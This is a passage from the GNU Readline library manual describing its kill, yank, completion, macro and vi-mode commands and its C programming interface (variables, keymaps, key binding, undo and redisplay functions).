Insert the character typed.
transpose-chars (C-t)
Drag the character before the cursor forward over the character at the cursor,
moving the cursor forward as well. If the insertion point is at the end of the
line, then this transposes the last two characters of the line. Negative arguments
have no effect.
transpose-words (M-t)
Drag the word before point past the word after point, moving point past that
word as well. If the insertion point is at the end of the line, this transposes the
last two words on the line.
upcase-word (M-u)
Uppercase the current (or following) word. With a negative argument, upper-
case the previous word, but do not move the cursor.
downcase-word (M-l)
Lowercase the current (or following) word. With a negative argument, lowercase
the previous word, but do not move the cursor.
capitalize-word (M-c)
Capitalize the current (or following) word. With a negative argument, capitalize
the previous word, but do not move the cursor.
overwrite-mode ()
Toggle overwrite mode. With an explicit positive numeric argument, switches
to overwrite mode. With an explicit non-positive numeric argument, switches to
insert mode. This command affects only emacs mode; vi mode does overwrite
differently. Each call to readline() starts in insert mode.
In overwrite mode, characters bound to self-insert replace the text at point
rather than pushing the text to the right.
Characters bound to backward-
delete-char replace the character before point with a space.
By default, this command is unbound.
1.4.4 Killing And Yanking
kill-line (C-k)
Kill the text from point to the end of the line.
backward-kill-line (C-x Rubout)
Kill backward to the beginning of the line.
unix-line-discard (C-u)
Kill backward from the cursor to the beginning of the current line.
kill-whole-line ()
Kill all characters on the current line, no matter where point is. By default,
this is unbound.
kill-word (M-d)
Kill from point to the end of the current word, or if between words, to the end
of the next word. Word boundaries are the same as forward-word.
backward-kill-word (M-DEL)
Kill the word behind point. Word boundaries are the same as backward-word.
unix-word-rubout (C-w)
Kill the word behind point, using white space as a word boundary. The killed
text is saved on the kill-ring.
unix-filename-rubout ()
Kill the word behind point, using white space and the slash character as the
word boundaries. The killed text is saved on the kill-ring.
delete-horizontal-space ()
Delete all spaces and tabs around point. By default, this is unbound.
kill-region ()
Kill the text in the current region. By default, this command is unbound.
copy-region-as-kill ()
Copy the text in the region to the kill buffer, so it can be yanked right away.
By default, this command is unbound.
copy-backward-word ()
Copy the word before point to the kill buffer. The word boundaries are the
same as backward-word. By default, this command is unbound.
copy-forward-word ()
Copy the word following point to the kill buffer. The word boundaries are the
same as forward-word. By default, this command is unbound.
yank (C-y)
Yank the top of the kill ring into the buffer at point.
yank-pop (M-y)
Rotate the kill-ring, and yank the new top. You can only do this if the prior
command is yank or yank-pop.
1.4.5 Specifying Numeric Arguments
digit-argument (M-0, M-1, ... M--)
Add this digit to the argument already accumulating, or start a new argument.
M-- starts a negative argument.
universal-argument ()
This is another way to specify an argument. If this command is followed by one
or more digits, optionally with a leading minus sign, those digits define the ar-
gument. If the command is followed by digits, executing universal-argument
again ends the numeric argument, but is otherwise ignored. As a special case,
if this command is immediately followed by a character that is neither a digit
nor a minus sign, the argument count for the next command is multiplied by four.
The argument count is initially one, so executing this function the first time
makes the argument count four, a second time makes the argument count six-
teen, and so on. By default, this is not bound to a key.
1.4.6 Letting Readline Type For You
complete (TAB)
Attempt to perform completion on the text before point. The actual completion
performed is application-specific. The default is filename completion.
possible-completions (M-?)
List the possible completions of the text before point.
insert-completions (M-*)
Insert all completions of the text before point that would have been generated
by possible-completions.
menu-complete ()
Similar to complete, but replaces the word to be completed with a single match
from the list of possible completions. Repeated execution of menu-complete
steps through the list of possible completions, inserting each match in turn.
At the end of the list of completions, the bell is rung (subject to the setting
of bell-style) and the original text is restored. An argument of n moves n
positions forward in the list of matches; a negative argument may be used to
move backward through the list. This command is intended to be bound to
TAB, but is unbound by default.
menu-complete-backward ()
Identical to menu-complete, but moves backward through the list of possible
completions, as if menu-complete had been given a negative argument.
delete-char-or-list ()
Deletes the character under the cursor if not at the beginning or end of the line
(like delete-char). If at the end of the line, behaves identically to possible-
completions. This command is unbound by default.
1.4.7 Keyboard Macros
start-kbd-macro (C-x ()
Begin saving the characters typed into the current keyboard macro.
end-kbd-macro (C-x ))
Stop saving the characters typed into the current keyboard macro and save the
definition.
call-last-kbd-macro (C-x e)
Re-execute the last keyboard macro defined, by making the characters in the
macro appear as if typed at the keyboard.
1.4.8 Some Miscellaneous Commands
re-read-init-file (C-x C-r)
Read in the contents of the inputrc file, and incorporate any bindings or variable
assignments found there.
abort (C-g)
Abort the current editing command and ring the terminal’s bell (subject to the
setting of bell-style).
do-uppercase-version (M-a, M-b, M-x, ...)
If the metafied character x is lowercase, run the command that is bound to the
corresponding uppercase character.
prefix-meta (ESC)
Metafy the next character typed. This is for keyboards without a meta key.
Typing ‘ESC f’ is equivalent to typing M-f.
undo (C-_ or C-x C-u)
Incremental undo, separately remembered for each line.
revert-line (M-r)
Undo all changes made to this line. This is like executing the undo command
enough times to get back to the beginning.
tilde-expand (M-~)
Perform tilde expansion on the current word.
set-mark (C-@)
Set the mark to the point. If a numeric argument is supplied, the mark is set
to that position.
exchange-point-and-mark (C-x C-x)
Swap the point with the mark. The current cursor position is set to the saved
position, and the old cursor position is saved as the mark.
character-search (C-])
A character is read and point is moved to the next occurrence of that character.
A negative count searches for previous occurrences.
character-search-backward (M-C-])
A character is read and point is moved to the previous occurrence of that
character. A negative count searches for subsequent occurrences.
skip-csi-sequence ()
Read enough characters to consume a multi-key sequence such as those defined
for keys like Home and End. Such sequences begin with a Control Sequence
Indicator (CSI), usually ESC-[. If this sequence is bound to "\e[", keys pro-
ducing such sequences will have no effect unless explicitly bound to a readline
command, instead of inserting stray characters into the editing buffer. This is
unbound by default, but usually bound to ESC-[.
insert-comment (M-#)
Without a numeric argument, the value of the comment-begin variable is in-
serted at the beginning of the current line. If a numeric argument is supplied,
this command acts as a toggle: if the characters at the beginning of the line
do not match the value of comment-begin, the value is inserted, otherwise the
characters in comment-begin are deleted from the beginning of the line. In
either case, the line is accepted as if a newline had been typed.
dump-functions ()
Print all of the functions and their key bindings to the Readline output stream.
If a numeric argument is supplied, the output is formatted in such a way that
it can be made part of an inputrc file. This command is unbound by default.
dump-variables ()
Print all of the settable variables and their values to the Readline output stream.
If a numeric argument is supplied, the output is formatted in such a way that
it can be made part of an inputrc file. This command is unbound by default.
dump-macros ()
Print all of the Readline key sequences bound to macros and the strings they
output. If a numeric argument is supplied, the output is formatted in such a
way that it can be made part of an inputrc file. This command is unbound by
default.
emacs-editing-mode (C-e)
When in vi command mode, this causes a switch to emacs editing mode.
vi-editing-mode (M-C-j)
When in emacs editing mode, this causes a switch to vi editing mode.
1.5 Readline vi Mode
While the Readline library does not have a full set of vi editing functions, it does contain
enough to allow simple editing of the line. The Readline vi mode behaves as specified in
the posix 1003.2 standard.
In order to switch interactively between emacs and vi editing modes, use the command
M-C-j (bound to emacs-editing-mode when in vi mode and to vi-editing-mode in emacs
mode). The Readline default is emacs mode.
When you enter a line in vi mode, you are already placed in ‘insertion’ mode, as if you
had typed an ‘i’. Pressing ESC switches you into ‘command’ mode, where you can edit the
text of the line with the standard vi movement keys, move to previous history lines with
‘k’ and subsequent lines with ‘j’, and so forth.
2 Programming with GNU Readline
This chapter describes the interface between the gnu Readline Library and other programs.
If you are a programmer, and you wish to include the features found in gnu Readline such
as completion, line editing, and interactive history manipulation in your own programs, this
section is for you.
2.1 Basic Behavior
Many programs provide a command line interface, such as mail, ftp, and sh. For such
programs, the default behaviour of Readline is sufficient. This section describes how to use
Readline in the simplest way possible, perhaps to replace calls in your code to gets() or
fgets().
The function readline() prints its prompt argument and then reads and returns a single
line of text from the user. If prompt is NULL or the empty string, no prompt is displayed.
The line readline returns is allocated with malloc(); the caller should free() the line
when it has finished with it. The declaration for readline in ANSI C is
char *readline (const char *prompt);
So, one might say
char *line = readline ("Enter a line: ");
in order to read a line of text from the user. The line returned has the final newline removed,
so only the text remains.
If readline encounters an EOF while reading the line, and the line is empty at that
point, then (char *)NULL is returned. Otherwise, the line is ended just as if a newline had
been typed.
If you want the user to be able to get at the line later, (with C-p for example), you must
call add_history() to save the line away in a history list of such lines.
add_history (line);
For full details on the GNU History Library, see the associated manual.
It is preferable to avoid saving empty lines on the history list, since users rarely have a
burning need to reuse a blank line. Here is a function which usefully replaces the standard
gets() library function, and has the advantage of no static buffer to overflow:
/* A static variable for holding the line. */
static char *line_read = (char *)NULL;
/* Read a string, and return a pointer to it.
Returns NULL on EOF. */
char *
rl_gets ()
{
/* If the buffer has already been allocated,
return the memory to the free pool. */
if (line_read)
{
free (line_read);
line_read = (char *)NULL;
}
/* Get a line from the user. */
line_read = readline ("");
/* If the line has any text in it,
save it on the history. */
if (line_read && *line_read)
add_history (line_read);
return (line_read);
}
This function gives the user the default behaviour of TAB completion: completion on file
names. If you do not want Readline to complete on filenames, you can change the binding
of the TAB key with rl_bind_key().
int rl_bind_key (int key, rl_command_func_t *function);
rl_bind_key() takes two arguments: key is the character that you want to bind, and
function is the address of the function to call when key is pressed. Binding TAB to rl_
insert() makes TAB insert itself. rl_bind_key() returns non-zero if key is not a valid
ASCII character code (between 0 and 255).
Thus, to disable the default TAB behavior, the following suffices:
rl_bind_key (’\t’, rl_insert);
This code should be executed once at the start of your program; you might write a func-
tion called initialize_readline() which performs this and other desired initializations,
such as installing custom completers (see Section 2.6 [Custom Completers], page 41).
2.2 Custom Functions
Readline provides many functions for manipulating the text of the line, but it isn’t possible
to anticipate the needs of all programs. This section describes the various functions and
variables defined within the Readline library which allow a user program to add customized
functionality to Readline.
Before declaring any functions that customize Readline’s behavior, or using any func-
tionality Readline provides in other code, an application writer should include the file
<readline/readline.h> in any file that uses Readline’s features. Since some of the defi-
nitions in readline.h use the stdio library, the file <stdio.h> should be included before
readline.h.
readline.h defines a C preprocessor variable that should be treated as an integer, RL_
READLINE_VERSION, which may be used to conditionally compile application code depending
on the installed Readline version. The value is a hexadecimal encoding of the major and
minor version numbers of the library, of the form 0xMMmm. MM is the two-digit major
version number; mm is the two-digit minor version number. For Readline 4.2, for example,
the value of RL_READLINE_VERSION would be 0x0402.
2.2.1 Readline Typedefs
For readability, we declare a number of new object types, all pointers to functions.
The reason for declaring these new types is to make it easier to write code describing
pointers to C functions with appropriately prototyped arguments and return values.
For instance, say we want to declare a variable func as a pointer to a function which
takes two int arguments and returns an int (this is the type of all of the Readline bindable
functions). Instead of the classic C declaration
int (*func)();
or the ANSI-C style declaration
int (*func)(int, int);
we may write
rl_command_func_t *func;
The full list of function pointer types available is
typedef int rl_command_func_t (int, int);
typedef char *rl_compentry_func_t (const char *, int);
typedef char **rl_completion_func_t (const char *, int, int);
typedef char *rl_quote_func_t (char *, int, char *);
typedef char *rl_dequote_func_t (char *, int);
typedef int rl_compignore_func_t (char **);
typedef void rl_compdisp_func_t (char **, int, int);
typedef int rl_hook_func_t (void);
typedef int rl_getc_func_t (FILE *);
typedef int rl_linebuf_func_t (char *, int);
typedef int rl_intfunc_t (int);
#define rl_ivoidfunc_t rl_hook_func_t
typedef int rl_icpfunc_t (char *);
typedef int rl_icppfunc_t (char **);
typedef void rl_voidfunc_t (void);
typedef void rl_vintfunc_t (int);
typedef void rl_vcpfunc_t (char *);
typedef void rl_vcppfunc_t (char **);
2.2.2 Writing a New Function
In order to write new functions for Readline, you need to know the calling conventions for
keyboard-invoked functions, and the names of the variables that describe the current state
of the line read so far.
The calling sequence for a command foo looks like
int foo (int count, int key)
where count is the numeric argument (or 1 if defaulted) and key is the key that invoked
this function.
It is completely up to the function as to what should be done with the numeric argument.
Some functions use it as a repeat count, some as a flag, and others to choose alternate
behavior (refreshing the current line as opposed to refreshing the screen, for example).
Some choose to ignore it. In general, if a function uses the numeric argument as a repeat
count, it should be able to do something useful with both negative and positive arguments.
At the very least, it should be aware that it can be passed a negative argument.
A command function should return 0 if its action completes successfully, and a non-zero
value if some error occurs. This is the convention obeyed by all of the builtin Readline
bindable command functions.
2.3 Readline Variables
These variables are available to function writers.
[Variable]
char * rl_line_buffer
This is the line gathered so far. You are welcome to modify the contents of the line,
but see Section 2.4.5 [Allowing Undoing], page 31. The function rl_extend_line_
buffer is available to increase the memory allocated to rl_line_buffer.
[Variable]
int rl_point
The offset of the current cursor position in rl_line_buffer (the point).
[Variable]
int rl_end
The number of characters present in rl_line_buffer. When rl_point is at the end
of the line, rl_point and rl_end are equal.
[Variable]
int rl_mark
The mark (saved position) in the current line. If set, the mark and point define a
region.
[Variable]
int rl_done
Setting this to a non-zero value causes Readline to return the current line immediately.
[Variable]
int rl_num_chars_to_read
Setting this to a positive value before calling readline() causes Readline to return
after accepting that many characters, rather than reading up to a character bound
to accept-line.
[Variable]
int rl_pending_input
Setting this to a value makes it the next keystroke read. This is a way to stuff a single
character into the input stream.
[Variable]
int rl_dispatching
Set to a non-zero value if a function is being called from a key binding; zero otherwise.
Application functions can test this to discover whether they were called directly or
by Readline’s dispatching mechanism.
[Variable]
int rl_erase_empty_line
Setting this to a non-zero value causes Readline to completely erase the current
line, including any prompt, any time a newline is typed as the only character on
an otherwise-empty line. The cursor is moved to the beginning of the newly-blank
line.
[Variable]
char * rl_prompt
The prompt Readline uses. This is set from the argument to readline(), and should
not be assigned to directly. The rl_set_prompt() function (see Section 2.4.6 [Redis-
play], page 32) may be used to modify the prompt string after calling readline().
[Variable]
char * rl_display_prompt
The string displayed as the prompt. This is usually identical to rl_prompt, but may
be changed temporarily by functions that use the prompt string as a message area,
such as incremental search.
[Variable]
int rl_already_prompted
If an application wishes to display the prompt itself, rather than have Readline do
it the first time readline() is called, it should set this variable to a non-zero value
after displaying the prompt. The prompt must also be passed as the argument to
readline() so the redisplay functions can update the display properly. The calling
application is responsible for managing the value; Readline never sets it.
[Variable]
const char * rl_library_version
The version number of this revision of the library.
[Variable]
int rl_readline_version
An integer encoding the current version of the library. The encoding is of the form
0xMMmm, where MM is the two-digit major version number, and mm is the two-
digit minor version number. For example, for Readline-4.2, rl_readline_version
would have the value 0x0402.
[Variable]
int rl_gnu_readline_p
Always set to 1, denoting that this is GNU Readline rather than some emulation.
[Variable]
const char * rl_terminal_name
The terminal type, used for initialization. If not set by the application, Readline sets
this to the value of the TERM environment variable the first time it is called.
[Variable]
const char * rl_readline_name
This variable is set to a unique name by each application using Readline. The value
allows conditional parsing of the inputrc file (see Section 1.3.2 [Conditional Init Con-
structs], page 10).
[Variable]
FILE * rl_instream
The stdio stream from which Readline reads input. If NULL, Readline defaults to
stdin.
[Variable]
FILE * rl_outstream
The stdio stream to which Readline performs output. If NULL, Readline defaults to
stdout.
[Variable]
int rl_prefer_env_winsize
If non-zero, Readline gives values found in the LINES and COLUMNS environment vari-
ables greater precedence than values fetched from the kernel when computing the
screen dimensions.
[Variable]
rl_command_func_t * rl_last_func
The address of the last command function Readline executed. May be used to test
whether or not a function is being executed twice in succession, for example.
[Variable]
rl_hook_func_t * rl_startup_hook
If non-zero, this is the address of a function to call just before readline prints the
first prompt.
[Variable]
rl_hook_func_t * rl_pre_input_hook
If non-zero, this is the address of a function to call after the first prompt has been
printed and just before readline starts reading input characters.
[Variable]
rl_hook_func_t * rl_event_hook
If non-zero, this is the address of a function to call periodically when Readline is
waiting for terminal input. By default, this will be called at most ten times a second
if there is no keyboard input.
[Variable]
rl_getc_func_t * rl_getc_function
If non-zero, Readline will call indirectly through this pointer to get a character from
the input stream. By default, it is set to rl_getc, the default Readline character
input function (see Section 2.4.8 [Character Input], page 34).
[Variable]
rl_voidfunc_t * rl_redisplay_function
If non-zero, Readline will call indirectly through this pointer to update the display
with the current contents of the editing buffer. By default, it is set to rl_redisplay,
the default Readline redisplay function (see Section 2.4.6 [Redisplay], page 32).
[Variable]
rl_vintfunc_t * rl_prep_term_function
If non-zero, Readline will call indirectly through this pointer to initialize the terminal.
The function takes a single argument, an int flag that says whether or not to use
eight-bit characters. By default, this is set to rl_prep_terminal (see Section 2.4.9
[Terminal Management], page 34).
[Variable]
rl_voidfunc_t * rl_deprep_term_function
If non-zero, Readline will call indirectly through this pointer to reset the terminal.
This function should undo the effects of rl_prep_term_function. By default, this
is set to rl_deprep_terminal (see Section 2.4.9 [Terminal Management], page 34).
[Variable]
Keymap rl_executing_keymap
This variable is set to the keymap (see Section 2.4.2 [Keymaps], page 28) in which
the currently executing readline function was found.
[Variable]
Keymap rl_binding_keymap
This variable is set to the keymap (see Section 2.4.2 [Keymaps], page 28) in which
the last key binding occurred.
[Variable]
char * rl_executing_macro
This variable is set to the text of any currently-executing macro.
[Variable]
int rl_readline_state
A variable with bit values that encapsulate the current Readline state. A bit is set
with the RL_SETSTATE macro, and unset with the RL_UNSETSTATE macro. Use the
RL_ISSTATE macro to test whether a particular state bit is set. Current state bits
include:
RL_STATE_NONE
Readline has not yet been called, nor has it begun to initialize.
RL_STATE_INITIALIZING
Readline is initializing its internal data structures.
RL_STATE_INITIALIZED
Readline has completed its initialization.
RL_STATE_TERMPREPPED
Readline has modified the terminal modes to do its own input and redis-
play.
RL_STATE_READCMD
Readline is reading a command from the keyboard.
RL_STATE_METANEXT
Readline is reading more input after reading the meta-prefix character.
RL_STATE_DISPATCHING
Readline is dispatching to a command.
RL_STATE_MOREINPUT
Readline is reading more input while executing an editing command.
RL_STATE_ISEARCH
Readline is performing an incremental history search.
RL_STATE_NSEARCH
Readline is performing a non-incremental history search.
RL_STATE_SEARCH
Readline is searching backward or forward through the history for a string.
RL_STATE_NUMERICARG
Readline is reading a numeric argument.
RL_STATE_MACROINPUT
Readline is currently getting its input from a previously-defined keyboard
macro.
RL_STATE_MACRODEF
Readline is currently reading characters defining a keyboard macro.
RL_STATE_OVERWRITE
Readline is in overwrite mode.
RL_STATE_COMPLETING
Readline is performing word completion.
RL_STATE_SIGHANDLER
Readline is currently executing the readline signal handler.
RL_STATE_UNDOING
Readline is performing an undo.
RL_STATE_INPUTPENDING
Readline has input pending due to a call to rl_execute_next().
RL_STATE_TTYCSAVED
Readline has saved the values of the terminal’s special characters.
RL_STATE_CALLBACK
Readline is currently using the alternate (callback) interface (see Sec-
tion 2.4.12 [Alternate Interface], page 37).
RL_STATE_VIMOTION
Readline is reading the argument to a vi-mode "motion" command.
RL_STATE_MULTIKEY
Readline is reading a multiple-keystroke command.
RL_STATE_VICMDONCE
Readline has entered vi command (movement) mode at least one time
during the current call to readline().
RL_STATE_DONE
Readline has read a key sequence bound to accept-line and is about to
return the line to the caller.
[Variable]
int rl_explicit_arg
Set to a non-zero value if an explicit numeric argument was specified by the user.
Only valid in a bindable command function.
[Variable]
int rl_numeric_arg
Set to the value of any numeric argument explicitly specified by the user before
executing the current Readline function. Only valid in a bindable command function.
[Variable]
int rl_editing_mode
Set to a value denoting Readline’s current editing mode. A value of 1 means Readline
is currently in emacs mode; 0 means that vi mode is active.
2.4 Readline Convenience Functions
2.4.1 Naming a Function
The user can dynamically change the bindings of keys while using Readline. This is done by
representing the function with a descriptive name. The user is able to type the descriptive
name when referring to the function. Thus, in an init file, one might find
Meta-Rubout: backward-kill-word
This binds the keystroke Meta-Rubout to the function descriptively named backward-kill-word. You, as the programmer, should bind the functions you write to descriptive
names as well. Readline provides a function for doing that:
[Function]
int rl_add_defun (const char *name, rl_command_func_t *function, int key)
Add name to the list of named functions. Make function be the function that gets
called. If key is not -1, then bind it to function using rl_bind_key().
Using this function alone is sufficient for most applications. It is the recommended way
to add a few functions to the default functions that Readline has built in. If you need to do
something other than adding a function to Readline, you may need to use the underlying
functions described below.
2.4.2 Selecting a Keymap
Key bindings take place on a keymap. The keymap is the association between the keys
that the user types and the functions that get run. You can make your own keymaps, copy
existing keymaps, and tell Readline which keymap to use.
[Function]
Keymap rl_make_bare_keymap (void)
Returns a new, empty keymap. The space for the keymap is allocated with malloc();
the caller should free it by calling rl_free_keymap() when done.
[Function]
Keymap rl_copy_keymap (Keymap map)
Return a new keymap which is a copy of map.
[Function]
Keymap rl_make_keymap (void)
Return a new keymap with the printing characters bound to rl_insert, the lowercase
Meta characters bound to run their equivalents, and the Meta digits bound to produce
numeric arguments.
[Function]
void rl_discard_keymap (Keymap keymap)
Free the storage associated with the data in keymap. The caller should free keymap.
[Function]
void rl_free_keymap (Keymap keymap)
Free all storage associated with keymap. This calls rl_discard_keymap to free subordinate keymaps and macros.
Readline has several internal keymaps. These functions allow you to change which keymap is active.
[Function]
Keymap rl_get_keymap (void)
Returns the currently active keymap.
[Function]
void rl_set_keymap (Keymap keymap)
Makes keymap the currently active keymap.
[Function]
Keymap rl_get_keymap_by_name (const char *name)
Return the keymap matching name. name is one which would be supplied in a set
keymap inputrc line (see Section 1.3 [Readline Init File], page 4).
[Function]
char * rl_get_keymap_name (Keymap keymap)
Return the name matching keymap. name is one which would be supplied in a set
keymap inputrc line (see Section 1.3 [Readline Init File], page 4).
2.4.3 Binding Keys
Key sequences are associated with functions through the keymap. Readline has several internal keymaps: emacs_standard_keymap, emacs_meta_keymap, emacs_ctlx_keymap, vi_movement_keymap, and vi_insertion_keymap. emacs_standard_keymap is the default, and the examples in this manual assume that.
Since readline() installs a set of default key bindings the first time it is called, there is
always the danger that a custom binding installed before the first call to readline() will
be overridden. An alternate mechanism is to install custom key bindings in an initialization
function assigned to the rl_startup_hook variable (see Section 2.3 [Readline Variables],
page 23).
These functions manage key bindings.
[Function]
int rl_bind_key (int key, rl_command_func_t *function)
Binds key to function in the currently active keymap. Returns non-zero in the case
of an invalid key.
[Function]
int rl_bind_key_in_map (int key, rl_command_func_t *function, Keymap map)
Bind key to function in map. Returns non-zero in the case of an invalid key.
[Function]
int rl_bind_key_if_unbound (int key, rl_command_func_t *function)
Binds key to function if it is not already bound in the currently active keymap.
Returns non-zero in the case of an invalid key or if key is already bound.
[Function]
int rl_bind_key_if_unbound_in_map (int key, rl_command_func_t *function, Keymap map)
Binds key to function if it is not already bound in map. Returns non-zero in the case
of an invalid key or if key is already bound.
[Function]
int rl_unbind_key (int key)
Bind key to the null function in the currently active keymap. Returns non-zero in
case of error.
[Function]
int rl_unbind_key_in_map (int key, Keymap map)
Bind key to the null function in map. Returns non-zero in case of error.
[Function]
int rl_unbind_function_in_map (rl_command_func_t *function, Keymap map)
Unbind all keys that execute function in map.
[Function]
int rl_unbind_command_in_map (const char *command, Keymap map)
Unbind all keys that are bound to command in map.
[Function]
int rl_bind_keyseq (const char *keyseq, rl_command_func_t *function)
Bind the key sequence represented by the string keyseq to the function function,
beginning in the current keymap. This makes new keymaps as necessary. The return
value is non-zero if keyseq is invalid.
[Function]
int rl_bind_keyseq_in_map (const char *keyseq, rl_command_func_t *function, Keymap map)
Bind the key sequence represented by the string keyseq to the function function. This
makes new keymaps as necessary. Initial bindings are performed in map. The return
value is non-zero if keyseq is invalid.
[Function]
int rl_set_key (const char *keyseq, rl_command_func_t *function, Keymap map)
Equivalent to rl_bind_keyseq_in_map.
[Function]
int rl_bind_keyseq_if_unbound (const char *keyseq, rl_command_func_t *function)
Binds keyseq to function if it is not already bound in the currently active keymap.
Returns non-zero in the case of an invalid keyseq or if keyseq is already bound.
[Function]
int rl_bind_keyseq_if_unbound_in_map (const char *keyseq, rl_command_func_t *function, Keymap map)
Binds keyseq to function if it is not already bound in map. Returns non-zero in the
case of an invalid keyseq or if keyseq is already bound.
[Function]
int rl_generic_bind (int type, const char *keyseq, char *data, Keymap map)
Bind the key sequence represented by the string keyseq to the arbitrary pointer data.
type says what kind of data is pointed to by data; this can be a function (ISFUNC), a
macro (ISMACR), or a keymap (ISKMAP). This makes new keymaps as necessary. The
initial keymap in which to do bindings is map.
[Function]
int rl_parse_and_bind (char *line)
Parse line as if it had been read from the inputrc file and perform any key bindings
and variable assignments found (see Section 1.3 [Readline Init File], page 4).
[Function]
int rl_read_init_file (const char *filename)
Read keybindings and variable assignments from filename (see Section 1.3 [Readline
Init File], page 4).
2.4.4 Associating Function Names and Bindings
These functions allow you to find out what keys invoke named functions and the functions
invoked by a particular key sequence. You may also associate a new function name with an
arbitrary function.
[Function]
rl_command_func_t * rl_named_function (const char *name)
Return the function with name name.
[Function]
rl_command_func_t * rl_function_of_keyseq (const char *keyseq, Keymap map, int *type)
Return the function invoked by keyseq in keymap map. If map is NULL, the current
keymap is used. If type is not NULL, the type of the object is returned in the int
variable it points to (one of ISFUNC, ISKMAP, or ISMACR).
[Function]
char ** rl_invoking_keyseqs (rl_command_func_t *function)
Return an array of strings representing the key sequences used to invoke function in
the current keymap.
[Function]
char ** rl_invoking_keyseqs_in_map (rl_command_func_t *function, Keymap map)
Return an array of strings representing the key sequences used to invoke function in
the keymap map.
[Function]
void rl_function_dumper (int readable)
Print the readline function names and the key sequences currently bound to them to
rl_outstream. If readable is non-zero, the list is formatted in such a way that it can
be made part of an inputrc file and re-read.
[Function]
void rl_list_funmap_names (void)
Print the names of all bindable Readline functions to rl_outstream.
[Function]
const char ** rl_funmap_names (void)
Return a NULL terminated array of known function names. The array is sorted. The
array itself is allocated, but not the strings inside. You should free the array, but not
the pointers, using free or rl_free when you are done.
[Function]
int rl_add_funmap_entry (const char *name, rl_command_func_t *function)
Add name to the list of bindable Readline command names, and make function the
function to be called when name is invoked.
2.4.5 Allowing Undoing
Supporting the undo command is a painless thing, and makes your functions much more
useful. It is certainly easy to try something if you know you can undo it.
If your function simply inserts text once, or deletes text once, and uses rl_insert_
text() or rl_delete_text() to do it, then undoing is already done for you automatically.
If you do multiple insertions or multiple deletions, or any combination of these operations,
you should group them together into one operation. This is done with rl_begin_undo_
group() and rl_end_undo_group().
The types of events that can be undone are:
enum undo_code { UNDO_DELETE, UNDO_INSERT, UNDO_BEGIN, UNDO_END };
Notice that UNDO_DELETE means to insert some text, and UNDO_INSERT means to delete
some text. That is, the undo code tells what to undo, not how to undo it. UNDO_BEGIN and
UNDO_END are tags added by rl_begin_undo_group() and rl_end_undo_group().
[Function]
int rl_begin_undo_group (void)
Begins saving undo information in a group construct. The undo information usually
comes from calls to rl_insert_text() and rl_delete_text(), but could be the
result of calls to rl_add_undo().
[Function]
int rl_end_undo_group (void)
Closes the current undo group started with rl_begin_undo_group(). There should be one call to rl_end_undo_group() for each call to rl_begin_undo_group().
[Function]
void rl_add_undo (enum undo_code what, int start, int end, char *text)
Remember how to undo an event (according to what). The affected text runs from start to end, and encompasses text.
[Function]
void rl_free_undo_list (void)
Free the existing undo list.
[Function]
int rl_do_undo (void)
Undo the first thing on the undo list. Returns 0 if there was nothing to undo, non-zero
if something was undone.
Finally, if you neither insert nor delete text, but directly modify the existing text (e.g.,
change its case), call rl_modifying() once, just before you modify the text. You must
supply the indices of the text range that you are going to modify.
[Function]
int rl_modifying (int start, int end)
Tell Readline to save the text between start and end as a single undo unit. It is
assumed that you will subsequently modify that text.
2.4.6 Redisplay
[Function]
void rl_redisplay (void)
Change what’s displayed on the screen to reflect the current contents of rl_line_
buffer.
[Function]
int rl_forced_update_display (void)
Force the line to be updated and redisplayed, whether or not Readline thinks the
screen display is correct.
[Function]
int rl_on_new_line (void)
Tell the update functions that we have moved onto a new (empty) line, usually after outputting a newline.
[Function]
int rl_on_new_line_with_prompt (void)
Tell the update functions that we have moved onto a new line, with rl_prompt already displayed. This could be used by applications that want to output the prompt string themselves, but still need Readline to know the prompt string length for redisplay. It should be used after setting rl_already_prompted.
[Function]
int rl_reset_line_state (void)
Reset the display state to a clean state and redisplay the current line starting on a
new line.
[Function]
int rl_crlf (void)
Move the cursor to the start of the next screen line.
[Function]
int rl_show_char (int c)
Display character c on rl_outstream. If Readline has not been set to display meta
characters directly, this will convert meta characters to a meta-prefixed key sequence.
This is intended for use by applications which wish to do their own redisplay.
[Function]
int rl_message (const char *, . . .)
The arguments are a format string as would be supplied to printf, possibly containing
conversion specifications such as ‘%d’, and any additional arguments necessary to
satisfy the conversion specifications.
The resulting string is displayed in the echo
area. The echo area is also used to display numeric arguments and search strings.
You should call rl_save_prompt to save the prompt information before calling this
function.
[Function]
int rl_clear_message (void)
Clear the message in the echo area. If the prompt was saved with a call to rl_save_
prompt before the last call to rl_message, call rl_restore_prompt before calling
this function.
[Function]
void rl_save_prompt (void)
Save the local Readline prompt display state in preparation for displaying a new
message in the message area with rl_message().
[Function]
void rl_restore_prompt (void)
Restore the local Readline prompt display state saved by the most recent call to
rl_save_prompt.
If rl_save_prompt was called to save the prompt before a call to rl_message, this function should be called before the corresponding call to rl_clear_message.
[Function]
int rl_expand_prompt (char *prompt)
Expand any special character sequences in prompt and set up the local Readline
prompt redisplay variables. This function is called by readline(). It may also be
called to expand the primary prompt if the rl_on_new_line_with_prompt() function
or rl_already_prompted variable is used. It returns the number of visible characters
on the last line of the (possibly multi-line) prompt. Applications may indicate that
the prompt contains characters that take up no physical screen space when displayed
by bracketing a sequence of such characters with the special markers RL_PROMPT_
START_IGNORE and RL_PROMPT_END_IGNORE (declared in ‘readline.h’). This may be
used to embed terminal-specific escape sequences in prompts.
[Function]
int rl_set_prompt (const char *prompt)
Make Readline use prompt for subsequent redisplay. This calls rl_expand_prompt()
to expand the prompt and sets rl_prompt to the result.
2.4.7 Modifying Text
[Function]
int rl_insert_text (const char *text)
Insert text into the line at the current cursor position. Returns the number of char-
acters inserted.
[Function]
int rl_delete_text (int start, int end)
Delete the text between start and end in the current line. Returns the number of
characters deleted.
[Function]
char * rl_copy_text (int start, int end)
Return a copy of the text between start and end in the current line.
[Function]
int rl_kill_text (int start, int end)
Copy the text between start and end in the current line to the kill ring, appending
or prepending to the last kill if the last command was a kill command. The text is
deleted. If start is less than end, the text is appended, otherwise prepended. If the
last command was not a kill, a new kill ring slot is used.
[Function]
int rl_push_macro_input (char *macro)
Cause macro to be inserted into the line, as if it had been invoked by a key bound to
a macro. Not especially useful; use rl_insert_text() instead.
2.4.8 Character Input
[Function]
int rl_read_key (void)
Return the next character available from Readline’s current input stream. This han-
dles input inserted into the input stream via rl_pending_input (see Section 2.3 [Read-
line Variables], page 23) and rl_stuff_char(), macros, and characters read from
the keyboard. While waiting for input, this function will call any function assigned
to the rl_event_hook variable.
[Function]
int rl_getc (FILE *stream)
Return the next character available from stream, which is assumed to be the keyboard.
[Function]
int rl_stuff_char (int c)
Insert c into the Readline input stream. It will be "read" before Readline attempts
